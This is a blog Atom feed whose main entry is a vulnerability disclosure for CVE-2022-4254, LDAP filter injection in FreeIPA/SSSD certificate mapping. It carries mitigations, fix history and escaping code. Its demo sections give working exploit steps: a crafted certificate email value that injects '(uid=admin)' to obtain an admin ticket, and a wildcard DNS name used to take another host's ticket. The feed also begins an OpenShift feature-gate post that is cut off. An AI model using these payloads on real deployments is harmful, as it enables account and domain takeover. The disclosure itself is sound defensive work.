<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
    <title>Fraser's IdM Blog</title>
    <link href="https://frasertweedale.github.io/blog-redhat/atom.xml" rel="self" />
    <link href="https://frasertweedale.github.io/blog-redhat" />
    <id>https://frasertweedale.github.io/blog-redhat/atom.xml</id>
    <author>
        <name>Fraser Tweedale</name>
        
        <email>frase@frase.id.au</email>
        
    </author>
    <updated>2023-02-02T00:00:00Z</updated>
    <entry>
    <title>CVE-2022-4254: FreeIPA PKINIT certificate mapping vulnerability</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2023-02-02-freeipa-pkinit-certmap-vuln.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2023-02-02-freeipa-pkinit-certmap-vuln.html</id>
    <published>2023-02-02T00:00:00Z</published>
    <updated>2023-02-02T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="cve-2022-4254-freeipa-pkinit-certificate-mapping-vulnerability">CVE-2022-4254: FreeIPA PKINIT certificate mapping vulnerability</h1>
<h2 id="executive-summary">Executive summary <a href="#executive-summary" class="section">§</a></h2>
<p><a href="https://www.freeipa.org/">FreeIPA</a> supports the Kerberos <em>PKINIT</em> protocol extension (<a href="https://datatracker.ietf.org/doc/html/rfc4556">RFC
4556</a>). PKINIT enables a client to authenticate to the KDC using
an X.509 certificate and the corresponding private key, rather than a
passphrase or keytab. FreeIPA uses <em>mapping rules</em> to map a
certificate presented during a PKINIT authentication request to the
corresponding principal. The mapping filter is vulnerable to LDAP
filter injection. The search result can be influenced by values in
the certificate, which may be attacker controlled. In the most
extreme case, an attacker could gain control of the <code>admin</code> account,
leading to full domain takeover.</p>
<p>FreeIPA is <strong>not vulnerable in its default configuration</strong>.
Exploiting this bug requires:</p>
<ul>
<li>PKINIT is used in the environment, with certmap rules that are
susceptible to LDAP filter injection via data from the client’s
certificate; and</li>
<li>A client certificate used for PKINIT includes data that result in
the construction of an LDAP filter with a different meaning than
the administrator intended. This is unlikely in general, but some
use cases present a heightened risk, especially if the CA includes
(or can be induced to include) client-supplied or
attacker-controlled attributes in end-entity certificates.</li>
</ul>
<p>The issue was assigned <a href="https://access.redhat.com/security/cve/CVE-2022-4254">CVE-2022-4254</a>.</p>
<h3 id="affected-versions">Affected versions <a href="#affected-versions" class="section">§</a></h3>
<p>The problem is in <em>libsss_certmap</em>, which is part of <a href="https://sssd.io/">SSSD</a>.
FreeIPA servers use this library in the <code>ipa_kdb</code> Kerberos plugin
implementation.</p>
<p>The issue was introduced in <a href="https://sssd.io/release-notes/sssd-1.15.3.html">SSSD 1.15.3</a> (when
<em>libsss_certmap</em> was introduced) and resolved in
<a href="https://sssd.io/release-notes/sssd-2.3.1.html">SSSD 2.3.1</a>.</p>
<p>All supported versions of RHEL 7 were affected (the fix was released
on the RHEL 7.9 bugfix stream). RHEL 8.0 up to 8.3 (inclusive) were
also affected (the fix was released to the still-supported streams).</p>
<p>RHEL 8.4 onwards and RHEL 9 are not affected. No supported versions
of Fedora are affected.</p>
<h3 id="timeline">Timeline <a href="#timeline" class="section">§</a></h3>
<ul>
<li><strong>2017-07-25</strong>: <em>libsss_certmap</em> was released with <a href="https://sssd.io/release-notes/sssd-1.15.3.html">SSSD 1.15.3</a>.</li>
<li><strong>2020-04-28</strong>: SSSD issue <a href="https://pagure.io/SSSD/sssd/issue/4180">pagure#4180</a> / <a href="https://github.com/SSSD/sssd/issues/5135">github#5135</a> was
created, reporting a lack of sanitisation of filter substitutions in
maprules.</li>
<li><strong>2020-07-24</strong>: The sanitisation issue was fixed upstream and <a href="https://sssd.io/release-notes/sssd-2.3.1.html">SSSD
2.3.1</a> was released, containing the fix.</li>
<li><strong>2022-11-16</strong>: While reviewing a feature involving the use of
PKINIT, I noticed that some versions of the <em>libsss_certmap</em> code
did not seem to sanitise certificate data used in LDAP filters. I
started to investigate.</li>
<li><strong>2022-11-17</strong>: I succeeded in exploiting the behaviour, and began
internal discussions with Red Hat’s Platform Security
engineering team.</li>
<li><strong>2022-12-01</strong>: I sent my analysis to Red Hat’s Product Security
team. <a href="https://access.redhat.com/security/cve/CVE-2022-4254">CVE-2022-4254</a> was reserved for this issue on the same
day.</li>
<li><strong>2023-01-24</strong>: Planned release of fix to RHEL 7.9 <code>sssd</code> package,
in Batch Update 20. Details of the vulnerability were made public.</li>
</ul>
<h2 id="problem-description">Problem description <a href="#problem-description" class="section">§</a></h2>
<p>FreeIPA supports <em>certificate mapping rules</em> for mapping
certificates presented during PKINIT authentication to a Kerberos
principal. Certmap rules are stored in the LDAP database under
<code>cn=certmaprules,cn=certmap,{basedn}</code>. The <code>ipa_kdb</code> plugin uses
<em>libsss_certmap</em> to process certmap rules. An example rule object:</p>
<pre class="ldif"><code>dn: cn=certmap1,cn=certmaprules,cn=certmap,dc=ipa,dc=test
cn: certmap1
ipacertmapmaprule: (|(mail={subject_rfc822_name})(entryDN={subject_dn}))
ipaenabledflag: TRUE
objectClass: ipacertmaprule
objectClass: top</code></pre>
<p>The <code>ipacertmapmaprule</code> attribute is a string representation of an LDAP
filter (<a href="https://datatracker.ietf.org/doc/html/rfc4515">RFC 4515</a>), with substitution templates in curly braces
(e.g. <code>{subject_dn}</code>). Template substitution is performed by the
<code>sss_certmap_get_search_filter</code> subroutine. The supported templates
are described in <code>sss_certmap(5)</code>. They include:</p>
<ul>
<li><code>{cert!base64}</code> (base64 encoding of whole certificate)</li>
<li><code>{issuer_dn}</code></li>
<li><code>{subject_dn}</code></li>
<li><code>{subject_rfc822_name}</code></li>
<li><code>{subject_dns_name}</code></li>
</ul>
<p>The KDC uses the resulting filter within a bigger search filter that
it uses to match the principal. The filter includes the requested
principal name from the Kerberos <em>authentication service request
(<code>AS_REQ</code>)</em>, and the maprule filter. The complete filter has the
following structure (wrapped for readability):</p>
<pre><code>(&amp;
  (|
    (objectClass=krbprincipalaux)
    (objectClass=krbprincipal)
    (objectClass=ipakrbprincipal)
  )
  (|
    (ipaKrbPrincipalAlias=REQUESTED_PRINCIPAL@REQUESTED_REALM)
    (krbPrincipalName:caseIgnoreIA5Match:=REQUESTED_PRINCIPAL@REQUESTED_REALM)
  )
  MAPRULE_FILTER_GOES_HERE
)</code></pre>
<p>Note that the requested principal is <strong>specified by the client</strong> in
the Kerberos <code>AS_REQ</code>. This value <em>is properly escaped</em> where it is
inserted in the filter. But it is important to note that the client
can specify any principal the maprule filter fragment matches.</p>
<h3 id="sanitisation-not-performed">Sanitisation not performed <a href="#sanitisation-not-performed" class="section">§</a></h3>
<p>Some template substitutions are inherently safe, but some use values
from the certificate that could contain characters with special
meaning in LDAP filters. Of the substitutions listed above, only
<code>{cert!base64}</code> is safe. The others could contain special
characters (and there are still more that I did not list). Values
that could contain special characters have to be sanitised
(escaped). Specifically, the following characters must be replaced
with a <em>hex escape sequence</em>:</p>
<ul>
<li><code>NUL</code> → <code>\00</code></li>
<li><code>(</code> → <code>\28</code></li>
<li><code>)</code> → <code>\29</code></li>
<li><code>*</code> → <code>\2A</code></li>
<li><code>\</code> → <code>\5C</code></li>
</ul>
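<p>The escaping rules listed above can be sketched in a few lines of
Python. This is a minimal illustration only; <code>escape_filter_value</code> is
a hypothetical helper name, not the SSSD implementation.</p>

```python
# Hypothetical helper (not SSSD code): escape a value before it is
# substituted into an RFC 4515 LDAP search filter.
_ESCAPES = {
    "\x00": r"\00",
    "(": r"\28",
    ")": r"\29",
    "*": r"\2A",
    "\\": r"\5C",
}


def escape_filter_value(value):
    """Replace each special character with its hex escape sequence."""
    # Characters are mapped one at a time, so a backslash produced by
    # an escape is never escaped a second time.
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


print(escape_filter_value('"bogus)(uid=admin)(cn="@ipa.test'))
print(escape_filter_value("*.ipa.test"))
```

<p>With the parentheses and asterisk escaped, the values used in the
demos below would be treated as literal strings rather than as filter
syntax.</p>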
<p>The affected versions of SSSD do not perform this sanitisation. As
a consequence, the template substitutions can result in invalid
filters (resulting in authentication failure) or filters that match
the wrong principal entry (dangerous). The next two sections
demonstrate two different exploit scenarios.</p>
<div class="note">
<p>LDAP filter injection has been assigned <a href="https://cwe.mitre.org/data/definitions/90.html">CWE-90</a> in the <em>Common
Weakness Enumeration</em> database. Conceptually it is very similar to
SQL injection (<a href="https://cwe.mitre.org/data/definitions/89.html">CWE-89</a>).</p>
</div>
<h2 id="demo-1-attacker-supplied-rfc822name">Demo 1: Attacker-supplied <code>rfc822Name</code> <a href="#demo-1-attacker-supplied-rfc822name" class="section">§</a></h2>
<p>We will issue a certificate with an attacker-supplied <code>rfc822Name</code>
SAN value to an unprivileged user. The deployment has a plausible
certmap rule with a structure that can be exploited to obtain a TGT
for an attacker-specified user account, including highly privileged
accounts such as <code>admin</code>.</p>
<p>It is a fresh deployment running FreeIPA 4.6 on RHEL 7.9:</p>
<pre class="shell"><code># cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.9 (Maipo)

# rpm -qa |grep ipa-
ipa-client-4.6.8-5.el7.x86_64
sssd-ipa-1.16.5-10.el7.x86_64
ipa-server-4.6.8-5.el7.x86_64
ipa-common-4.6.8-5.el7.noarch
ipa-client-common-4.6.8-5.el7.noarch
ipa-server-common-4.6.8-5.el7.noarch</code></pre>
<h3 id="setup">Setup <a href="#setup" class="section">§</a></h3>
<p>Setup steps establish the user account, certmap rules, certificate
profiles and issuance policies required for the subsequent attack.
I perform these steps using the <code>admin</code> account:</p>
<pre><code># klist
Ticket cache: KEYRING:persistent:0:0
Default principal: admin@IPA.TEST

Valid starting     Expires            Service principal
28/11/22 23:00:19  29/11/22 23:00:07  ldap/rhel78-0.ipa.test@IPA.TEST
28/11/22 23:00:09  29/11/22 23:00:07  krbtgt/IPA.TEST@IPA.TEST</code></pre>
<p>Create the unprivileged user <code>alice</code>. She will be the subject
principal to whom the certificate will be issued.</p>
<pre class="shell"><code># ipa user-add alice --first Alice --last Able --password
Password: XXXXXXXX
Enter Password again to verify: XXXXXXXX
------------------
Added user &quot;alice&quot;
------------------
...</code></pre>
<p>Add a new <code>mail</code> attribute to <code>alice</code>’s LDAP entry. This will
enable us to issue a certificate from the internal CA that includes
the value as an <code>rfc822Name</code> Subject Alternative Name value.</p>
<pre class="shell"><code># echo &gt; mod.ldif &lt;&lt;EOF
dn: uid=alice,cn=users,cn=accounts,dc=ipa,dc=test
changetype: modify
add: mail
mail: &quot;bogus)(uid=admin)(cn=&quot;@ipa.test
EOF

# ldapmodify -Y GSSAPI &lt; mod.ldif
modifying entry &quot;uid=alice,cn=users,cn=accounts,dc=ipa,dc=test&quot;</code></pre>
<p>I had to add the new <code>mail</code> attribute via <code>ldapmodify</code> because the
email validation performed by the IPA API does not admit all valid
local-part values. But it is in fact a valid email address.</p>
<div class="note">
<p>The default access controls in FreeIPA do not allow non-admins to
modify <code>mail</code> attributes, even in their own entry. But I use this
approach because it is plausible for an organisation to have a
system that allows employees to request a specific mail alias.
Indeed we have such a system at Red Hat, although I don’t know if it
would allow such an exotic value.</p>
</div>
<p>Next, add a <em>CA ACL</em> rule that permits certificates to be issued to
user principals. For convenience we will use the included
<code>caIPAserviceCert</code> profile. Typical real world user certificate
scenarios would require a dedicated profile.</p>
<pre class="shell"><code># ipa caacl-add users_caIPAserviceCert --usercat=all
-------------------------------------
Added CA ACL &quot;users_caIPAserviceCert&quot;
-------------------------------------
  ACL name: users_caIPAserviceCert
  Enabled: TRUE
  User category: all

# ipa caacl-add-profile users_caIPAserviceCert --certprofile caIPAserviceCert
  ACL name: users_caIPAserviceCert
  Enabled: TRUE
  User category: all
  Profiles: caIPAserviceCert
-------------------------
Number of members added 1
-------------------------</code></pre>
<p>Finally add the certmap rule. It has a two-part <em>or-list</em> intended
to match the <code>rfc822Name</code> from the certificate to the <code>mail</code>
attribute, or else match the certificate subject DN to the DN of the
LDAP entry:</p>
<pre class="shell"><code># ipa certmaprule-add certmap1 --maprule \
    &quot;(|(mail={subject_rfc822_name})(entryDN={subject_dn}))&quot;
--------------------------------------------------
Added Certificate Identity Mapping Rule &quot;certmap1&quot;
--------------------------------------------------
  Rule name: certmap1
  Mapping rule: (|(mail={subject_rfc822_name})(entryDN={subject_dn}))
  Enabled: TRUE</code></pre>
<div class="note">
<p>The steps performed above are not part of the exploit itself, and
they require administrator privileges to perform. They are
presented as plausible configurations, the likes of which <em>may</em>
exist (or not) in a customer’s environment.</p>
</div>
<h3 id="exploit">Exploit <a href="#exploit" class="section">§</a></h3>
<p><code>alice</code> will request a certificate with the suspicious <code>rfc822Name</code>
and <strong>acquire a TGT for the <code>admin</code> user</strong>. First obtain a TGT for
<code>alice</code> (using password authentication):</p>
<pre class="shell"><code>$ kinit alice
Password for alice@IPA.TEST:</code></pre>
<p>Create a new keypair and certificate signing request (CSR). The
config causes the CSR to bear a SAN extension request containing
the malicious <code>rfc822Name</code>:</p>
<pre class="shell"><code>$ echo &gt; naughty.conf &lt;&lt;EOF
[ req ]
prompt = no
encrypt_key = no
distinguished_name = dn
req_extensions = exts
[ dn ]
commonName = &quot;alice&quot;
[ exts ]
subjectAltName=email:\&quot;bogus)(uid=admin)(cn=\&quot;@ipa.test
EOF

$ openssl req -new -config naughty.conf \
    -keyout naughty.key -out naughty.csr
Generating a 2048 bit RSA private key
..........+++
......................+++
writing new private key to &#39;naughty.key&#39;
-----</code></pre>
<p>Issue the certificate (this is a <em>self-service</em> certificate request,
which FreeIPA allows, subject to CA ACLs):</p>
<pre class="shell"><code>$ ipa cert-request naughty.csr \
    --principal alice \
    --certificate-out naughty.pem
  Issuing CA: ipa
  Certificate: MIIEPjCC...
  Subject: CN=alice,O=IPA.TEST 202211171708
  Subject email address: &quot;bogus)(uid=admin)(cn=&quot;@ipa.test
  Issuer: CN=Certificate Authority,O=IPA.TEST 202211171708
  Not Before: Tue Nov 29 04:42:58 2022 UTC
  Not After: Fri Nov 29 04:42:58 2024 UTC
  Serial number: 13
  Serial number (hex): 0xD</code></pre>
<p>Finally, use the new certificate and key to obtain a TGT <strong>for
<code>admin</code></strong>:</p>
<pre class="shell"><code>$ kinit -X X509_user_identity=FILE:naughty.pem,naughty.key admin

$ klist
Ticket cache: KEYRING:persistent:1001:krb_ccache_UnnYkF2
Default principal: admin@IPA.TEST

Valid starting     Expires            Service principal
28/11/22 23:47:44  29/11/22 23:47:44  krbtgt/IPA.TEST@IPA.TEST</code></pre>
<p>The exploit succeeds because the unescaped <code>rfc822Name</code> value
results in a filter that matches the <code>admin</code> user (formatted for
readability):</p>
<pre><code>(&amp;
  (|
    (objectClass=krbprincipalaux)
    (objectClass=krbprincipal)
    (objectClass=ipakrbprincipal)
  )
  (|
    (ipaKrbPrincipalAlias=admin@IPA.TEST)
    (krbPrincipalName:caseIgnoreIA5Match:=admin@IPA.TEST)
  )
  (|
    (mail=&quot;bogus)
    (uid=admin)
    (cn=&quot;@ipa.test)
    (entrydn=CN=alice,O=IPA.TEST 202211171708)
  )
)</code></pre>
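<p>To see how the extra clauses appear, here is a minimal Python sketch of
template substitution without escaping. The <code>fill_template</code> function
is a hypothetical stand-in for the substitution step, not the
<em>libsss_certmap</em> code; the maprule and certificate values are the
ones from this demo.</p>

```python
# Hypothetical stand-in for the template substitution step; this is
# not the libsss_certmap implementation.
def fill_template(maprule, values):
    """Substitute {name} templates with values, without any escaping."""
    result = maprule
    for name, value in values.items():
        result = result.replace("{" + name + "}", value)
    return result


maprule = "(|(mail={subject_rfc822_name})(entryDN={subject_dn}))"
cert_values = {
    "subject_rfc822_name": '"bogus)(uid=admin)(cn="@ipa.test',
    "subject_dn": "CN=alice,O=IPA.TEST 202211171708",
}

injected = fill_template(maprule, cert_values)
print(injected)
```

<p>The parentheses in the <code>rfc822Name</code> close the <code>mail</code> clause
early and open new ones, so the or-list gains a <code>(uid=admin)</code> clause
that the administrator never wrote.</p>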
<h2 id="demo-2-wildcard-dns-name">Demo 2: Wildcard DNS name <a href="#demo-2-wildcard-dns-name" class="section">§</a></h2>
<p>A wildcard certificate can be used to <strong>obtain a TGT for a different
host principal</strong>.</p>
<h3 id="setup-1">Setup <a href="#setup-1" class="section">§</a></h3>
<p>Add a profile for issuing wildcard certificates. I will skip the
details and instead refer to my <a href="https://frasertweedale.github.io/blog-redhat/posts/2017-06-26-freeipa-wildcard-san.html">blog post on this topic</a>.</p>
<p>Add a host called <code>ipa.test</code>, a <em>host group</em> called <code>webservers</code>,
and make <code>ipa.test</code> a member of <code>webservers</code>:</p>
<pre class="host"><code># ipa host-add ipa.test --force
----------------------
Added host &quot;ipa.test&quot;
----------------------
  Host name: ipa.test
  Principal name: host/ipa.test@IPA.TEST
  Principal alias: host/ipa.test@IPA.TEST
  Password: False
  Keytab: False
  Managed by: ipa.test

# ipa hostgroup-add webservers
----------------------------
Added hostgroup &quot;webservers&quot;
----------------------------
  Host-group: webservers

# ipa hostgroup-add-member webservers --hosts ipa.test
  Host-group: webservers
  Member hosts: ipa.test
-------------------------
Number of members added 1
-------------------------</code></pre>
<p>Add a <em>CA ACL</em> that allows <code>webservers</code> to be issued certificates
via the <code>wildcard</code> profile:</p>
<pre class="shell"><code># ipa caacl-add webservers_wildcard
----------------------------------
Added CA ACL &quot;webservers_wildcard&quot;
----------------------------------
  ACL name: webservers_wildcard
  Enabled: TRUE

# ipa caacl-add-host webservers_wildcard --hostgroup webservers
  ACL name: webservers_wildcard
  Enabled: TRUE
  Host Groups: webservers
-------------------------
Number of members added 1
-------------------------

# ipa caacl-add-profile webservers_wildcard --certprofile wildcard
  ACL name: webservers_wildcard
  Enabled: TRUE
  Profiles: wildcard
  Host Groups: webservers
-------------------------
Number of members added 1
-------------------------</code></pre>
<p>Finally, add a certmap rule that uses SAN <code>dNSName</code> values to locate
the principal:</p>
<pre class="shell"><code># ipa certmaprule-add certmap2 \
    --maprule &quot;(fqdn={subject_dns_name})&quot;
--------------------------------------------------
Added Certificate Identity Mapping Rule &quot;certmap2&quot;
--------------------------------------------------
  Rule name: certmap2
  Mapping rule: (fqdn={subject_dns_name})
  Enabled: TRUE</code></pre>
<h3 id="exploit-1">Exploit <a href="#exploit-1" class="section">§</a></h3>
<p>We will issue a wildcard certificate for <code>ipa.test</code>, and use it to
obtain a TGT for a different host. You could use <em>Certmonger</em> to
request the certificate, but I will interact directly with FreeIPA
via the <code>ipa</code> client program. The operator is the <code>host/ipa.test</code>
principal (I <code>kinit</code>ed using the host keytab):</p>
<pre class="shell"><code>$ klist
Ticket cache: KEYRING:persistent:1001:krb_ccache_UnnYkF2
Default principal: host/ipa.test@IPA.TEST

Valid starting     Expires            Service principal
29/11/22 03:52:59  30/11/22 03:52:59  krbtgt/IPA.TEST@IPA.TEST</code></pre>
<p>Create a keypair and CSR:</p>
<pre class="shell"><code>$ openssl req -new -subj &#39;/CN=ipa.test/&#39; -nodes \
    -keyout server.key -out server.csr
Generating a 2048 bit RSA private key
........................................................+++
.....................................................................................................................+++
writing new private key to &#39;server.key&#39;
-----</code></pre>
<p>Request the certificate, being sure to specify the <code>wildcard</code>
profile:</p>
<pre class="shell"><code>$ ipa cert-request server.csr \
    --principal host/ipa.test \
    --profile-id wildcard \
    --certificate-out server.pem
  Issuing CA: ipa
  Certificate: MIIENTCC...
  Subject: CN=ipa.test,O=IPA.TEST 202211171708
  Subject DNS name: ipa.test, *.ipa.test
  Issuer: CN=Certificate Authority,O=IPA.TEST 202211171708
  Not Before: Tue Nov 29 09:14:09 2022 UTC
  Not After: Fri Nov 29 09:14:09 2024 UTC
  Serial number: 16
  Serial number (hex): 0x10</code></pre>
<p>Finally, use the new certificate and key to obtain a TGT for a
<strong>different host</strong> whose <code>fqdn</code> attribute matches the LDAP
substring filter <code>(fqdn=*.ipa.test)</code>. In this example I acquire the
TGT for <strong><code>host/rhel78-0.ipa.test</code></strong> (one of the FreeIPA servers).</p>
<pre class="shell"><code>$ kinit -X X509_user_identity=FILE:server.pem,server.key \
    host/rhel78-0.ipa.test

$ klist
Ticket cache: KEYRING:persistent:1001:krb_ccache_UnnYkF2
Default principal: host/rhel78-0.ipa.test@IPA.TEST

Valid starting     Expires            Service principal
29/11/22 04:15:52  30/11/22 04:15:52  krbtgt/IPA.TEST@IPA.TEST</code></pre>
<p>The exploit succeeds because the unescaped wildcard <code>dNSName</code> value
results in a <strong><em>substring match</em></strong> filter (formatted for
readability):</p>
<pre><code>(&amp;
  (|
    (objectClass=krbprincipalaux)
    (objectClass=krbprincipal)
    (objectClass=ipakrbprincipal)
  )
  (|
    (ipaKrbPrincipalAlias=host/rhel78-0.ipa.test@IPA.TEST)
    (krbPrincipalName:caseIgnoreIA5Match:=host/rhel78-0.ipa.test@IPA.TEST)
  )
  (fqdn=*.ipa.test)
)</code></pre>
<p>The maprule filter matches any principal whose <code>fqdn</code> attribute ends
in <code>.ipa.test</code>. This sub-filter could match multiple principal
entries, but the <em>client-specified</em> principal name used in the
<code>krbPrincipalName</code> and <code>ipaKrbPrincipalAlias</code> filters selects the one
we want.</p>
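<p>The effect of the unescaped asterisk can be approximated with a small
Python matcher. This is a rough sketch of substring matching for
illustration only; <code>substring_match</code> is a hypothetical helper, the
host names other than those in this demo are made up, and a real
directory server applies the attribute's own matching rules.</p>

```python
# Hypothetical approximation of an LDAP substring assertion, where
# each '*' in the pattern matches any run of characters.
def substring_match(pattern, value):
    parts = pattern.split("*")
    if len(parts) == 1:
        # No asterisk: plain equality match.
        return value == parts[0]
    first, middle, last = parts[0], parts[1:-1], parts[-1]
    if not value.startswith(first):
        return False
    pos = len(first)
    for part in middle:
        idx = value.find(part, pos)
        if idx == -1:
            return False
        pos = idx + len(part)
    # The final component must fit after everything matched so far.
    return value.endswith(last) and len(value) - len(last) >= pos


hosts = ["ipa.test", "rhel78-0.ipa.test", "web1.ipa.test", "host.example.com"]
matched = [h for h in hosts if substring_match("*.ipa.test", h)]
print(matched)
```

<p>An escaped value would only be compared for equality with the literal
string <code>*.ipa.test</code>, which no host entry is likely to have as its
<code>fqdn</code>.</p>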
<p>If there are multiple SAN values of the relevant type, the order is
important. The <em>last</em> value is used in the template substitution.
In my certificate, the last value is <code>*.ipa.test</code> so the exploit
succeeds. If the order were reversed, the exploit would not succeed.
This is an implementation detail of SSSD; it might as well have used
the first value but it just happened to be implemented this way.</p>
<h2 id="discussion">Discussion <a href="#discussion" class="section">§</a></h2>
<p>These exploits required a confluence of contributing factors to
succeed. Deployments using PKINIT with exact certificate matching
(the default) are unaffected. The vulnerability only arises
when the customer uses certmap rules. None are defined by default.
Certmap rules (if they exist) are only <em>potentially</em> vulnerable;
several other factors have to come together.</p>
<p>The attacker must obtain a valid certificate from a trusted CA for a
key they control. Except in limited cases (e.g. wildcard DNS names)
the attacker must be able to influence the attributes on the
certificate. Only <em>free-form</em> string attributes are potentially
problematic. These include DNS name, email address, SAN DN values,
principal names, and perhaps others. And there have to be SSSD
certmap rule template substitutions for the targeted attribute(s).</p>
<p>Next, there has to be a certmap rule that substitutes the
problematic value into the LDAP search filter. All filters that
substitute free-form attributes are susceptible to exploitation.
But in practice, <em>or-list</em> filters are <em>more susceptible</em> to
exploitation than <em>and-list</em> or single-clause filters. This is
because the attacker has more flexibility in how to make the filter
match the target account. But as we saw in the wildcard <code>dNSName</code>
example, even a single-clause filter fragment could be exploitable.</p>
<div class="note">
<p>The default ACIs allow any authenticated account to read certmap
rule entries. This may aid attackers in working out the attack
details.</p>
</div>
<p>Note that most <em>free-form</em> attributes have additional syntax rules
imposed upon them. For example, a SAN <code>dNSName</code> value should look
like a DNS name, and a SAN <code>rfc822Name</code> value should be a valid
email address. But the raw ASN.1 data does not guarantee this.
Even legal values can be problematic (as demonstrated). But if a
trusted CA can be induced to issue certificates that contain
<em>arbitrary</em> data in those free-form attributes, there is an even
greater risk of exploitation.</p>
<p>The use of the internal CA in this attack is incidental. The
administrator can configure FreeIPA to trust external CAs for
validating client PKINIT certificates. Any trusted CA can be used
in the attack, if the attacker can cause it to issue certificates
containing problematic values. Note that the KDC trusts the whole
system trust store, not just the trusted CAs from the FreeIPA CA
trust store. Certmap rules can be equipped with <em>matching rules</em> to
restrict which issuers are allowed for PKINIT certificate matching,
separate from CA trust for certification path verification purposes.</p>
<h2 id="mitigations">Mitigations <a href="#mitigations" class="section">§</a></h2>
<h3 id="use-exact-certificate-matching-do-not-use-certmap-rules">Use exact certificate matching / do not use certmap rules <a href="#use-exact-certificate-matching-do-not-use-certmap-rules" class="section">§</a></h3>
<p>PKINIT uses exact certificate matching by default. If feasible, you
can rely on that method and disable or delete any certmap rules.
<code>ipa certmaprule-find</code> lists all certmap rules that have been
defined. Use <code>ipa certmaprule-disable NAME</code> or <code>ipa certmaprule-del NAME</code> to disable or delete certmap rules, respectively.</p>
<p>The main drawback to this approach is that each principal’s entry
must have an up-to-date <code>userCertificate</code> attribute containing the
user’s certificate(s). This increases the size of entries, and may
have additional administrative overhead depending on how certificates
are issued and managed.</p>
<h3 id="audit-and-de-risk-certmap-rules">Audit and de-risk certmap rules <a href="#audit-and-de-risk-certmap-rules" class="section">§</a></h3>
<p>Non-sanitised parameter substitution in an LDAP filter <em>or-list</em> is
riskier than in <em>and-lists</em> or single-clause filters. Replace certmap rules
containing <em>or-lists</em> with multiple, separate certmap rules.</p>
<p>Ensure each rule is as specific as possible, and consider the
possibility of outlier or malicious values in the certificate when
designing certmap rules.</p>
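<p>A first pass of such an audit could be scripted. The following Python
sketch flags maprules that use free-form templates or contain an
or-list. The <code>audit</code> and <code>risky_templates</code> helpers are hypothetical,
and the template set only covers the names mentioned in this post; see
<code>sss_certmap(5)</code> for the full list.</p>

```python
import re

# Templates named in this post whose values are free-form strings.
# Illustrative only; this is not the complete list from sss_certmap(5).
FREE_FORM = {"issuer_dn", "subject_dn", "subject_rfc822_name", "subject_dns_name"}


def risky_templates(maprule):
    """Return the free-form templates used in a maprule, sorted by name."""
    # Capture the template name, ignoring any "!option" suffix.
    names = re.findall(r"\{([^{}!]+)(?:![^{}]*)?\}", maprule)
    return sorted(set(names).intersection(FREE_FORM))


def audit(maprule):
    """Summarise the two risk factors discussed above for one maprule."""
    return {
        "free_form_templates": risky_templates(maprule),
        "has_or_list": "(|" in maprule,
    }


print(audit("(|(mail={subject_rfc822_name})(entryDN={subject_dn}))"))
print(audit("(userCertificate;binary={cert!bin})"))
```

<p>A rule that is flagged is not necessarily exploitable; the result is
only a prompt for manual review.</p>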
<h3 id="review-ca-trust-profiles-and-validation">Review CA trust, profiles and validation <a href="#review-ca-trust-profiles-and-validation" class="section">§</a></h3>
<p>Review the kinds of data, especially user-supplied or user-writeable
data, that can be included on certificates issued by CAs that are
trusted for PKINIT purposes. Audit how those data are validated.</p>
<p>Review and limit which CAs are trusted for PKINIT to only those that
are necessary. If possible, consider using dedicated CAs for
issuing the client certificates used for PKINIT. Use the certmap
<em>matching rule</em> feature (not discussed here) to restrict the KDC to
only allow certificates issued by the PKINIT CAs.</p>
<h2 id="fix">Fix <a href="#fix" class="section">§</a></h2>
<p>Lack of sanitisation in certmap LDAP filter construction was
recognised as a bug in SSSD issue <a href="https://pagure.io/SSSD/sssd/issue/4180">pagure#4180</a> / <a href="https://github.com/SSSD/sssd/issues/5135">github#5135</a>.
The framing of the issue was that legitimate values in the
certificate were causing SSSD to construct invalid LDAP filters. It
appears that the security implications were not recognised or
discussed at that time.</p>
<p>SSSD commit <a href="https://github.com/SSSD/sssd/commit/a2b9a84460429181f2a4fa7e2bb5ab49fd561274">a2b9a84460429181f2a4fa7e2bb5ab49fd561274</a>
implemented the required sanitisation. <a href="https://sssd.io/release-notes/sssd-2.3.1.html">SSSD 2.3.1</a> was the first
release containing the fix. Commit
<a href="https://github.com/SSSD/sssd/commit/918fb32af6a271230bf87db47f78768edb9ca86c">918fb32af6a271230bf87db47f78768edb9ca86c</a> on
<strong>2022-01-06</strong> backported the fix to the <code>sssd-1.16</code> branch, but
there has not yet been a new release from this branch containing the
fix.</p>
<p>The SSSD team backported the fix to RHEL 7.9. It was included in
Batch Update 20 which was released on <strong>2023-01-24</strong>. Fixes to
extended support streams for RHEL 8.1 and 8.2 were also released on
that day, meaning that the issue is now fixed in all supported
versions of RHEL.</p>]]></summary>
</entry>
<entry>
    <title>Enabling Kubernetes feature gates in OpenShift</title>
    <link href="https://frasertweedale.github.io/blog-redhat/posts/2023-01-22-openshift-feature-gates.html" />
    <id>https://frasertweedale.github.io/blog-redhat/posts/2023-01-22-openshift-feature-gates.html</id>
    <published>2023-01-22T00:00:00Z</published>
    <updated>2023-01-22T00:00:00Z</updated>
    <summary type="html"><![CDATA[<h1 id="enabling-kubernetes-feature-gates-in-openshift">Enabling Kubernetes feature gates in OpenShift</h1>
<p>When Kubernetes adds a feature or changes an existing one, the new
behaviour usually starts out hidden behind a <a href="https://kubernetes.io/docs/reference/command-line-tools-reference/feature-gates/"><em>feature
gate</em></a>. Enhancements start off in the <em>Alpha</em>
stability class, where they are usually guarded by a feature gate
that is <strong>off by default</strong>. If the enhancement proves stable and
useful, after a few releases it will be promoted to <em>Beta</em>, and the
feature gate will typically default to <strong>on</strong>, though it can still
be disabled. The final stage of an enhancement is <em>GA (generally
available)</em>. If an enhancement reaches this stage, its feature gate
becomes non-operational and is <a href="https://kubernetes.io/docs/reference/using-api/deprecation-policy/">deprecated</a>, to be removed in a
later release.</p>
<p>So, in a real world deployment how do you enable or disable a
feature gate? There are several “distributions” of Kubernetes and
various ways of doing it. In this short post I’ll demonstrate how
to enable feature gates in <em>OpenShift</em>, Red Hat’s container
orchestration platform which is built on Kubernetes.</p>
<h2 id="the-featuregate-resource">The <code>FeatureGate</code> resource <a href="#the-featuregate-resource" class="section">§</a></h2>
<p>OpenShift recognises a <code>FeatureGate</code> resource type. A single
resource of this type named <code>cluster</code> determines the feature gates
